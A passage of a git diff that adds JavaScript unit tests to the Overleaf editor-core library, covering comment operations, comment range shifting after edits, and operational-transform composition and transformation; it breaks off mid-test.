invertedOp.apply(fileData) + expect(fileData.getComments().toRaw()).to.eql([]) + }) + + it('should restore previous comment ranges', function () { + const initialComments = [ + { + id: '123', + ranges: [{ pos: 0, length: 1 }], + }, + ] + + const initialFileData = new StringFileData( + 'the quick brown fox jumps over the lazy dog', + initialComments + ) + const fileData = StringFileData.fromRaw(initialFileData.toRaw()) + const op = new AddCommentOperation('123', [new Range(12, 7)], true) + op.apply(fileData) + expect(fileData.getComments().toRaw()).to.eql([ + { + id: '123', + ranges: [{ pos: 12, length: 7 }], + resolved: true, + }, + ]) + + const invertedOp = op.invert(initialFileData) + invertedOp.apply(fileData) + expect(fileData.getComments().toRaw()).to.deep.equal(initialComments) + }) + + it('should restore previous comment resolution status', function () { + const initialComments = [ + { + id: '123', + ranges: [{ pos: 0, length: 1 }], + }, + ] + + const initialFileData = new StringFileData( + 'the quick brown fox jumps over the lazy dog', + initialComments + ) + const fileData = StringFileData.fromRaw(initialFileData.toRaw()) + const op = new AddCommentOperation('123', [new Range(0, 1)], true) + op.apply(fileData) + expect(fileData.getComments().toRaw()).to.eql([ + { + id: '123', + ranges: [{ pos: 0, length: 1 }], + resolved: true, + }, + ]) + + const invertedOp = op.invert(initialFileData) + invertedOp.apply(fileData) + expect(fileData.getComments().toRaw()).to.deep.equal(initialComments) + }) + }) + + it('should compose with DeleteCommentOperation', function () { + const addOp = new AddCommentOperation('123', [new Range(0, 1)]) + const deleteOp = new DeleteCommentOperation('123') + expect(addOp.canBeComposedWith(deleteOp)).to.be.true + + const composedOp = addOp.compose(deleteOp) + expect(composedOp).to.be.instanceOf(DeleteCommentOperation) + }) +}) diff --git a/libraries/overleaf-editor-core/test/change.test.js b/libraries/overleaf-editor-core/test/change.test.js new file mode 100644 index 0000000..b4704fa --- /dev/null +++ b/libraries/overleaf-editor-core/test/change.test.js @@ -0,0 +1,62 @@ +'use strict' + +const { expect } = require('chai') +const core = require('..') +const Change = core.Change +const File = core.File +const Operation = core.Operation + +describe('Change', function () { + describe('findBlobHashes', function () { + it('finds blob hashes from operations', function () { + const blobHashes = new Set() + + const change = Change.fromRaw({ + operations: [], + timestamp: '2015-03-05T12:03:53.035Z', + authors: [null], + }) + + change.findBlobHashes(blobHashes) + expect(blobHashes.size).to.equal(0) + + // AddFile with content doesn't have a hash. + change.pushOperation(Operation.addFile('a.txt', File.fromString('a'))) + change.findBlobHashes(blobHashes) + expect(blobHashes.size).to.equal(0) + + // AddFile with hash should give us a hash. 
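+      // (File.fromHash stores only a blob hash, which findBlobHashes collects)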
+      change.pushOperation(
+        Operation.addFile('b.txt', File.fromHash(File.EMPTY_FILE_HASH))
+      )
+      change.findBlobHashes(blobHashes)
+      expect(blobHashes.size).to.equal(1)
+      expect(blobHashes.has(File.EMPTY_FILE_HASH)).to.be.true
+    })
+  })
+
+  describe('RestoreFileOrigin', function () {
+    it('should convert to and from raw', function () {
+      const origin = new core.RestoreFileOrigin(1, 'path', new Date())
+      const raw = origin.toRaw()
+      const newOrigin = core.Origin.fromRaw(raw)
+      expect(newOrigin).to.eql(origin)
+    })
+
+    it('change should have a correct origin class', function () {
+      const change = Change.fromRaw({
+        operations: [],
+        timestamp: '2015-03-05T12:03:53.035Z',
+        authors: [null],
+        origin: {
+          kind: 'file-restore',
+          version: 1,
+          path: 'path',
+          timestamp: '2015-03-05T12:03:53.035Z',
+        },
+      })
+
+      expect(change.getOrigin()).to.be.an.instanceof(core.RestoreFileOrigin)
+    })
+  })
+})
diff --git a/libraries/overleaf-editor-core/test/comment.test.js b/libraries/overleaf-editor-core/test/comment.test.js
new file mode 100644
index 0000000..f235c9e
--- /dev/null
+++ b/libraries/overleaf-editor-core/test/comment.test.js
@@ -0,0 +1,116 @@
+// @ts-check
+'use strict'
+
+const { expect } = require('chai')
+const Comment = require('../lib/comment')
+const Range = require('../lib/range')
+
+describe('Comment', function () {
+  it('should move ranges to the right of insert', function () {
+    const comment = new Comment('c1', [new Range(5, 10)])
+    const resComment = comment.applyInsert(3, 5, false)
+    expect(resComment.ranges).to.eql([new Range(10, 10)])
+  })
+
+  describe('applyInsert', function () {
+    it('should insert 1 char before the range', function () {
+      const comment = new Comment('c1', [new Range(5, 10)])
+      expect(comment.applyInsert(4, 1).ranges).to.eql([new Range(6, 10)])
+    })
+
+    it('should insert 1 char at the edge, without expandComment', function () {
+      const comment = new Comment('c1', [new Range(5, 10)])
+      expect(comment.applyInsert(5, 1).ranges).to.eql([new Range(6, 10)])
+    })
+
+    it('should insert 1 char at the edge, with expandComment', function () {
+      const comment = new Comment('c1', [new Range(5, 10)])
+      expect(comment.applyInsert(5, 1, true).ranges).to.eql([new Range(5, 11)])
+    })
+
+    it('should expand the range after insert inside it', function () {
+      const comment = new Comment('c1', [new Range(5, 10)])
+      expect(comment.applyInsert(6, 1, true).ranges).to.eql([new Range(5, 11)])
+    })
+  })
+
+  it('should split the range if inside another and expandComment is false', function () {
+    const comment = new Comment('c1', [new Range(5, 10)])
+    const commentRes = comment.applyInsert(6, 10, false)
+    expect(commentRes.ranges).to.eql([new Range(5, 1), new Range(16, 9)])
+  })
+
+  it('should split the range if insert is inside it near the end and expandComment is false', function () {
+    const comment = new Comment('c1', [new Range(5, 10)])
+    const commentRes = comment.applyInsert(14, 10, false)
+    expect(commentRes.ranges).to.eql([new Range(5, 9), new Range(24, 1)])
+  })
+
+  it('should move the range if insert is at range start and expandComment is false', function () {
+    const comment = new Comment('c1', [new Range(5, 10)])
+    const commentRes = comment.applyInsert(5, 10, false)
+    expect(commentRes.ranges).to.eql([new Range(15, 10)])
+  })
+
+  it('should ignore the range if insert is at range end and expandComment is false', function () {
+    const comment = new Comment('c1', [new Range(5, 10)])
+    const commentRes = comment.applyInsert(15, 10, false)
+    expect(commentRes.ranges).to.eql([new Range(5, 10)])
+  })
+
+  it('should 
expand the range after inserting on the edge of it if expandComment is true', function () { + const comment = new Comment('c1', [new Range(5, 10)]) + const commentRes = comment.applyInsert(15, 10, true) + expect(commentRes.ranges).to.eql([new Range(5, 20)]) + }) + + it('should move comment ranges if delete is before it', function () { + const comment = new Comment('c1', [new Range(5, 10)]) + const commentRes = comment.applyDelete(new Range(3, 5)) + expect(commentRes.ranges).to.eql([new Range(3, 7)]) + }) + + it('should merge ranges after delete', function () { + const comment = new Comment('c1', [new Range(5, 10), new Range(20, 10)]) + const commentRes = comment.applyDelete(new Range(7, 18)) + expect(commentRes.ranges).to.eql([new Range(5, 7)]) + }) + + it('should merge overlapping ranges', function () { + const comment = new Comment('c1', [ + new Range(5, 10), + new Range(15, 20), + new Range(50, 10), + ]) + expect(comment.ranges).to.eql([new Range(5, 30), new Range(50, 10)]) + }) + + it('should merge unsorted ranges', function () { + const comment = new Comment('c1', [ + new Range(15, 20), + new Range(50, 10), + new Range(5, 10), + ]) + expect(comment.ranges).to.eql([new Range(5, 30), new Range(50, 10)]) + }) + + it('should throw error when ranges overlap', function () { + expect( + () => + new Comment('c1', [ + new Range(5, 10), + new Range(10, 5), + new Range(50, 10), + ]) + ).to.throw() + }) + + it('should join touching ranges', function () { + const comment = new Comment('c1', [ + new Range(5, 10), + new Range(15, 5), + new Range(50, 10), + ]) + expect(comment.ranges).to.eql([new Range(5, 15), new Range(50, 10)]) + }) +}) diff --git a/libraries/overleaf-editor-core/test/comments_list.test.js b/libraries/overleaf-editor-core/test/comments_list.test.js new file mode 100644 index 0000000..d687863 --- /dev/null +++ b/libraries/overleaf-editor-core/test/comments_list.test.js @@ -0,0 +1,430 @@ +// @ts-check +'use strict' + +const { expect } = require('chai') +const CommentList = require('../lib/file_data/comment_list') +const Comment = require('../lib/comment') +const Range = require('../lib/range') + +describe('commentList', function () { + it('checks if toRaw() returns a correct comment list', function () { + const commentList = new CommentList([ + new Comment('comm1', [new Range(5, 10)]), + new Comment('comm2', [new Range(20, 5)]), + new Comment('comm3', [new Range(30, 15)]), + ]) + + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 20, length: 5 }] }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + }) + + it('should get a comment by id', function () { + const commentList = new CommentList([ + new Comment('comm1', [new Range(5, 10)]), + new Comment('comm3', [new Range(30, 15)]), + new Comment('comm2', [new Range(20, 5)]), + ]) + + const comment = commentList.getComment('comm2') + expect(comment?.toRaw()).to.eql({ + id: 'comm2', + ranges: [ + { + pos: 20, + length: 5, + }, + ], + }) + }) + + it('should add new comment to the list', function () { + const commentList = new CommentList([ + new Comment('comm1', [new Range(5, 10)]), + new Comment('comm2', [new Range(20, 5)]), + new Comment('comm3', [new Range(30, 15)]), + ]) + + commentList.add(new Comment('comm4', [new Range(40, 10)])) + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 20, length: 5 }] }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + { + id: 
'comm4', + ranges: [{ pos: 40, length: 10 }], + }, + ]) + }) + + it('should overwrite existing comment if new one is added', function () { + const commentList = new CommentList([ + new Comment('comm1', [new Range(5, 10)], false), + new Comment('comm2', [new Range(20, 5)], true), + new Comment('comm3', [new Range(30, 15)]), + ]) + + commentList.add(new Comment('comm1', [new Range(5, 10)], true)) + commentList.add(new Comment('comm2', [new Range(40, 10)], true)) + + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }], resolved: true }, + { + id: 'comm2', + ranges: [{ pos: 40, length: 10 }], + resolved: true, + }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + }) + + it('should delete a comment from the list', function () { + const commentList = new CommentList([ + new Comment('comm1', [new Range(5, 10)]), + new Comment('comm2', [new Range(20, 5)]), + new Comment('comm3', [new Range(30, 15)]), + ]) + + commentList.delete('comm3') + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 20, length: 5 }] }, + ]) + }) + + it('should not throw an error if comment id does not exist', function () { + const commentList = new CommentList([ + new Comment('comm1', [new Range(5, 10)]), + new Comment('comm2', [new Range(20, 5)]), + new Comment('comm3', [new Range(30, 15)]), + ]) + + commentList.delete('comm5') + + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 20, length: 5 }] }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + }) + + it('should be iterable', function () { + const comment = new Comment('comm1', [new Range(5, 10)]) + const commentList = new CommentList([comment]) + expect(Array.from(commentList)).to.deep.equal([comment]) + }) + + describe('inserting a comment between ranges', function () { + it('should expand comment on the left', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], + }, + { + id: 'comm2', + ranges: [{ pos: 15, length: 10 }], + }, + ]) + + commentList.applyInsert(new Range(15, 5), { commentIds: ['comm1'] }) + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 15 }] }, + { id: 'comm2', ranges: [{ pos: 20, length: 10 }] }, + ]) + }) + + it('should expand comment on the right', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], + }, + { + id: 'comm2', + ranges: [{ pos: 15, length: 10 }], + }, + ]) + + commentList.applyInsert(new Range(15, 5), { commentIds: ['comm2'] }) + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 15, length: 15 }] }, + ]) + }) + }) + + it('should delete a text overlapping two comments', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], // 5-14 + }, + { + id: 'comm2', + ranges: [{ pos: 15, length: 10 }], // 15-24 + }, + ]) + + commentList.applyDelete(new Range(10, 10)) // 10-19 + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 5 }] }, + { id: 'comm2', ranges: [{ pos: 10, length: 5 }] }, + ]) + }) + + describe('move ranges after insert/delete operations', function () { + it('expands comments inside inserted text', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 
}], + }, + { + id: 'comm2', + ranges: [{ pos: 20, length: 5 }], + }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + + commentList.applyInsert(new Range(7, 5), { commentIds: ['comm1'] }) + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 15 }] }, + { id: 'comm2', ranges: [{ pos: 25, length: 5 }] }, + { id: 'comm3', ranges: [{ pos: 35, length: 15 }] }, + ]) + }) + + it('should insert an overlapping comment without overlapped comment id', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], + }, + { + id: 'comm2', + ranges: [{ pos: 20, length: 5 }], + }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + + commentList.applyInsert(new Range(7, 5), { commentIds: ['comm2'] }) + expect(commentList.toRaw()).to.eql([ + { + id: 'comm1', + ranges: [ + { pos: 5, length: 2 }, + { pos: 12, length: 8 }, + ], + }, + { + id: 'comm2', + ranges: [ + { pos: 7, length: 5 }, + { pos: 25, length: 5 }, + ], + }, + { id: 'comm3', ranges: [{ pos: 35, length: 15 }] }, + ]) + }) + + it('should insert an overlapping comment with overlapped comment id', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 15 }], + }, + { + id: 'comm2', + ranges: [{ pos: 20, length: 5 }], + }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + + commentList.applyInsert(new Range(7, 5), { + commentIds: ['comm1', 'comm2'], + }) + expect(commentList.toRaw()).to.eql([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 20 }], + }, + { + id: 'comm2', + ranges: [ + { pos: 7, length: 5 }, + { pos: 25, length: 5 }, + ], + }, + { id: 'comm3', ranges: [{ pos: 35, length: 15 }] }, + ]) + }) + + it('moves comments after inserted text', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], + }, + { + id: 'comm2', + ranges: [{ pos: 20, length: 5 }], + }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + + commentList.applyInsert(new Range(16, 5)) + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 25, length: 5 }] }, + { id: 'comm3', ranges: [{ pos: 35, length: 15 }] }, + ]) + }) + + it('does not affect comments outside of inserted text', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], + }, + { + id: 'comm2', + ranges: [{ pos: 20, length: 5 }], + }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + + commentList.applyInsert(new Range(50, 5)) + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 20, length: 5 }] }, + { id: 'comm3', ranges: [{ pos: 30, length: 15 }] }, + ]) + }) + + it('should move comments if delete happened before it', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], + }, + { + id: 'comm2', + ranges: [{ pos: 20, length: 5 }], + }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + + commentList.applyDelete(new Range(0, 4)) + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 1, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 16, length: 5 }] }, + { id: 'comm3', ranges: [{ pos: 26, length: 15 }] }, + ]) + }) + + describe('should remove part of a comment on delete overlapping', function () { + it('should delete intersection from the left', 
function () {
+      const commentList = CommentList.fromRaw([
+        {
+          id: 'comm1',
+          ranges: [{ pos: 5, length: 10 }],
+        },
+      ])
+
+      commentList.applyDelete(new Range(0, 6))
+      expect(commentList.toRaw()).to.eql([
+        { id: 'comm1', ranges: [{ pos: 0, length: 9 }] },
+      ])
+    })
+
+    it('should delete intersection from the right', function () {
+      const commentList = CommentList.fromRaw([
+        {
+          id: 'comm1',
+          ranges: [{ pos: 5, length: 10 }],
+        },
+      ])
+      commentList.applyDelete(new Range(7, 10))
+      expect(commentList.toRaw()).to.eql([
+        { id: 'comm1', ranges: [{ pos: 5, length: 2 }] },
+      ])
+    })
+
+    it('should delete intersection in the middle', function () {
+      const commentList = CommentList.fromRaw([
+        {
+          id: 'comm1',
+          ranges: [{ pos: 5, length: 10 }],
+        },
+      ])
+      commentList.applyDelete(new Range(6, 2))
+      expect(commentList.toRaw()).to.eql([
+        { id: 'comm1', ranges: [{ pos: 5, length: 8 }] },
+      ])
+    })
+  })
+
+  it('should leave comment without ranges', function () {
+    const commentList = CommentList.fromRaw([
+      {
+        id: 'comm1',
+        ranges: [{ pos: 5, length: 10 }],
+      },
+      {
+        id: 'comm2',
+        ranges: [{ pos: 20, length: 5 }],
+      },
+      {
+        id: 'comm3',
+        ranges: [{ pos: 30, length: 15 }],
+      },
+    ])
+
+    commentList.applyDelete(new Range(19, 10))
+    expect(commentList.toRaw()).to.eql([
+      {
+        id: 'comm1',
+        ranges: [{ pos: 5, length: 10 }],
+      },
+      { id: 'comm2', ranges: [] },
+      {
+        id: 'comm3',
+        ranges: [{ pos: 20, length: 15 }],
+      },
+    ])
+  })
+  })
+})
diff --git a/libraries/overleaf-editor-core/test/delete_comment_operation.test.js b/libraries/overleaf-editor-core/test/delete_comment_operation.test.js
new file mode 100644
index 0000000..c6d2260
--- /dev/null
+++ b/libraries/overleaf-editor-core/test/delete_comment_operation.test.js
@@ -0,0 +1,46 @@
+// @ts-check
+const { expect } = require('chai')
+const { AddCommentOperation, DeleteCommentOperation } = require('..')
+const Comment = require('../lib/comment')
+const StringFileData = require('../lib/file_data/string_file_data')
+const Range = require('../lib/range')
+
+describe('DeleteCommentOperation', function () {
+  it('constructs a DeleteCommentOperation fromJSON', function () {
+    const op = DeleteCommentOperation.fromJSON({
+      deleteComment: '123',
+    })
+    expect(op).to.be.instanceOf(DeleteCommentOperation)
+  })
+
+  it('should convert to JSON', function () {
+    const op = new DeleteCommentOperation('123')
+    expect(op.toJSON()).to.eql({
+      deleteComment: '123',
+    })
+  })
+
+  it('should apply operation', function () {
+    const fileData = new StringFileData('abc')
+    const op = new DeleteCommentOperation('123')
+    fileData.comments.add(new Comment('123', [new Range(0, 1)]))
+    op.apply(fileData)
+    expect(fileData.getComments().toRaw()).to.eql([])
+  })
+
+  it('should invert operation', function () {
+    const fileData = new StringFileData('abc')
+    const op = new DeleteCommentOperation('123')
+    fileData.comments.add(new Comment('123', [new Range(0, 1)]))
+    const invertedOp = /** @type {AddCommentOperation} */ (op.invert(fileData))
+    expect(invertedOp).to.be.instanceOf(AddCommentOperation)
+    expect(invertedOp.commentId).to.equal('123')
+    expect(invertedOp.ranges).to.eql([new Range(0, 1)])
+  })
+
+  it('should not throw if comment not found', function () {
+    const fileData = new StringFileData('abc')
+    const op = new DeleteCommentOperation('123')
+    expect(() => op.invert(fileData)).to.not.throw()
+  })
+})
diff --git a/libraries/overleaf-editor-core/test/edit_file_operation.test.js b/libraries/overleaf-editor-core/test/edit_file_operation.test.js
new file mode 100644
index 0000000..c51e380
--- /dev/null
+++ b/libraries/overleaf-editor-core/test/edit_file_operation.test.js
@@ -0,0 +1,81 @@
+// @ts-check
+'use strict'
+
+const { expect } = require('chai')
+
+const ot = require('..')
+const EditOperationBuilder = require('../lib/operation/edit_operation_builder')
+const File = ot.File
+const Operation = ot.Operation
+
+describe('EditFileOperation', function () {
+  function edit(pathname, textOperationJsonObject) {
+    return Operation.editFile(
+      pathname,
+      EditOperationBuilder.fromJSON({ textOperation: textOperationJsonObject })
+    )
+  }
+
+  describe('canBeComposedWith', function () {
+    it('on the same file', function () {
+      const editFileOperation1 = edit('foo.tex', ['x'])
+      const editFileOperation2 = edit('foo.tex', [1, 'y'])
+      expect(editFileOperation1.canBeComposedWith(editFileOperation2)).to.be
+        .true
+    })
+
+    it('on different files', function () {
+      const editFileOperation1 = edit('foo.tex', ['x'])
+      const editFileOperation2 = edit('bar.tex', ['y'])
+      expect(editFileOperation1.canBeComposedWith(editFileOperation2)).to.be
+        .false
+    })
+
+    it('with a different type of operation', function () {
+      const editFileOperation1 = edit('foo.tex', ['x'])
+      const editFileOperation2 = Operation.addFile(
+        'bar.tex',
+        File.fromString('')
+      )
+      expect(editFileOperation1.canBeComposedWith(editFileOperation2)).to.be
+        .false
+    })
+
+    it('with incompatible lengths', function () {
+      const editFileOperation1 = edit('foo.tex', ['x'])
+      const editFileOperation2 = edit('foo.tex', [2, 'y'])
+      expect(editFileOperation1.canBeComposedWith(editFileOperation2)).to.be
+        .false
+    })
+  })
+
+  describe('canBeComposedWithForUndo', function () {
+    it('can', function () {
+      const editFileOperation1 = edit('foo.tex', ['x'])
+      const editFileOperation2 = edit('foo.tex', [1, 'y'])
+      expect(editFileOperation1.canBeComposedWithForUndo(editFileOperation2)).to
+        .be.true
+    })
+
+    it('cannot', function () {
+      const editFileOperation1 = edit('foo.tex', ['x'])
+      const editFileOperation2 = edit('foo.tex', ['y', 1, 'z'])
+      expect(editFileOperation1.canBeComposedWithForUndo(editFileOperation2)).to
+        .be.false
+    })
+  })
+
+  describe('compose', function () {
+    it('composes text operations', function () {
+      const editFileOperation1 = edit('foo.tex', ['x'])
+      const editFileOperation2 = edit('foo.tex', [1, 'y'])
+      const composedFileOperation =
+        editFileOperation1.compose(editFileOperation2)
+      const expectedComposedFileOperation = edit('foo.tex', ['xy'])
+      expect(composedFileOperation).to.deep.equal(expectedComposedFileOperation)
+
+      // check that the original operation wasn't modified
+      expect(editFileOperation1).to.deep.equal(edit('foo.tex', ['x']))
+    })
+  })
+})
diff --git a/libraries/overleaf-editor-core/test/edit_operation.test.js b/libraries/overleaf-editor-core/test/edit_operation.test.js
new file mode 100644
index 0000000..56570f0
--- /dev/null
+++ b/libraries/overleaf-editor-core/test/edit_operation.test.js
@@ -0,0 +1,315 @@
+const { expect } = require('chai')
+const EditOperationBuilder = require('../lib/operation/edit_operation_builder')
+const TextOperation = require('../lib/operation/text_operation')
+const EditOperationTransformer = require('../lib/operation/edit_operation_transformer')
+const EditOperation = require('../lib/operation/edit_operation')
+const randomTextOperation = require('./support/random_text_operation')
+const random = require('./support/random')
+const AddCommentOperation = require('../lib/operation/add_comment_operation')
+const DeleteCommentOperation = 
require('../lib/operation/delete_comment_operation') +const SetCommentStateOperation = require('../lib/operation/set_comment_state_operation') +const Range = require('../lib/range') +const EditNoOperation = require('../lib/operation/edit_no_operation') + +describe('EditOperation', function () { + it('Cannot be instantiated', function () { + expect(() => new EditOperation()).to.throw( + 'Cannot instantiate abstract class' + ) + }) +}) + +describe('EditOperationTransformer', function () { + it('Transforms two TextOperations', function () { + const a = new TextOperation().insert('foo') + const b = new TextOperation().insert('bar') + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(TextOperation) + expect(bPrime).to.be.an.instanceof(TextOperation) + }) + + it('Transforms TextOperation and EditNoOperation', function () { + const a = new TextOperation().insert('foo') + const b = new EditNoOperation() + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(TextOperation) + expect(bPrime).to.be.an.instanceof(EditNoOperation) + }) + + it('Transforms two AddCommentOperations with same commentId', function () { + const a = new AddCommentOperation('comm1', [new Range(0, 1)]) + const b = new AddCommentOperation('comm1', [new Range(2, 3)]) + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(EditNoOperation) + expect(bPrime).to.be.an.instanceof(AddCommentOperation) + }) + + it('Transforms two AddCommentOperations with different commentId', function () { + const a = new AddCommentOperation('comm1', [new Range(0, 1)]) + const b = new AddCommentOperation('comm2', [new Range(2, 3)]) + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(AddCommentOperation) + expect(aPrime.toJSON()).to.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(AddCommentOperation) + expect(bPrime.toJSON()).to.eql(b.toJSON()) + }) + + it('Transforms two DeleteCommentOperations with same commentId', function () { + const a = new DeleteCommentOperation('comm1') + const b = new DeleteCommentOperation('comm1') + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(EditNoOperation) + expect(bPrime).to.be.an.instanceof(EditNoOperation) + }) + + it('Transforms two DeleteCommentOperations with different commentId', function () { + const a = new DeleteCommentOperation('comm1') + const b = new DeleteCommentOperation('comm2') + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(DeleteCommentOperation) + expect(aPrime.toJSON()).to.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(DeleteCommentOperation) + expect(bPrime.toJSON()).to.eql(b.toJSON()) + }) + + it('Transforms AddCommentOperation and DeleteCommentOperation with same commentId', function () { + const a = new AddCommentOperation('comm1', [new Range(0, 1)]) + const b = new DeleteCommentOperation('comm1') + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(EditNoOperation) + expect(bPrime).to.be.an.instanceof(DeleteCommentOperation) + expect(bPrime.toJSON()).to.eql(b.toJSON()) + }) + + it('Transforms DeleteCommentOperation and AddCommentOperation with same commentId', function () { + const a = new DeleteCommentOperation('comm1') + const b = new AddCommentOperation('comm1', [new Range(0, 1)]) + const [aPrime, bPrime] = 
EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(DeleteCommentOperation) + expect(aPrime.toJSON()).to.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(EditNoOperation) + }) + + it('Transforms AddCommentOperation and TextOperation', function () { + // abc hello[ world] xyz - insert(9, " world") + // abc hello |xyz| - addComment(10, 3, "comment_id") + + const a = new TextOperation().retain(9).insert(' world') + const b = new AddCommentOperation('comm1', [new Range(10, 3)]) + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(TextOperation) + expect(aPrime.toJSON()).to.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(AddCommentOperation) + expect(bPrime.toJSON()).to.eql({ + commentId: 'comm1', + ranges: [{ pos: 16, length: 3 }], + }) + }) + + it('Transforms TextOperation and AddCommentOperation', function () { + // abc hello |xyz| - addComment(10, 3, "comment_id") + // abc hello[ world] xyz - insert(9, " world") + + const a = new AddCommentOperation('comm1', [new Range(10, 3)]) + const b = new TextOperation().retain(9).insert(' world') + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(bPrime).to.be.an.instanceof(TextOperation) + expect(bPrime.toJSON()).to.eql(b.toJSON()) + expect(aPrime).to.be.an.instanceof(AddCommentOperation) + expect(aPrime.toJSON()).to.eql({ + commentId: 'comm1', + ranges: [{ pos: 16, length: 3 }], + }) + }) + + it('Transforms AddCommentOperation and TextOperation that makes a detached comment', function () { + // [abc hello xyz] - delete(0, 13) + // abc |hello| xyz - addComment(5, 5, "comment_id") + + const a = new TextOperation().remove(13) + const b = new AddCommentOperation('comm1', [new Range(5, 5)]) + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(TextOperation) + expect(aPrime.toJSON()).to.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(AddCommentOperation) + expect(bPrime.toJSON()).to.eql({ + commentId: 'comm1', + ranges: [], + }) + }) + + it('Transforms AddCommentOperation and deletion TextOperation', function () { + // abc hell{o xy}z - retain(8).delete(4) + // abc hello |xyz| - addComment(10, 3, "comment_id") + // abc hell|z| + + const a = new TextOperation().retain(8).remove(4) + const b = new AddCommentOperation('comm1', [new Range(10, 3)]) + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(TextOperation) + expect(aPrime.toJSON()).to.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(AddCommentOperation) + expect(bPrime.toJSON()).to.eql({ + commentId: 'comm1', + ranges: [{ pos: 8, length: 1 }], + }) + }) + + it('Transforms AddCommentOperation and complex TextOperation', function () { + // [foo ]abc hell{o xy}z - insert(0, "foo ").retain(8).delete(4) + // abc hello |xyz| - addComment(10, 3, "comment_id") + // foo abc hell|z| + + const a = new TextOperation().insert('foo ').retain(8).remove(4) + const b = new AddCommentOperation('comm1', [new Range(10, 3)]) + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(TextOperation) + expect(aPrime.toJSON()).to.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(AddCommentOperation) + expect(bPrime.toJSON()).to.eql({ + commentId: 'comm1', + ranges: [{ pos: 12, length: 1 }], + }) + }) + + it('Transforms DeleteCommentOperation and TextOperation', function () { + const a = new TextOperation().retain(9).insert(' world') + const b = 
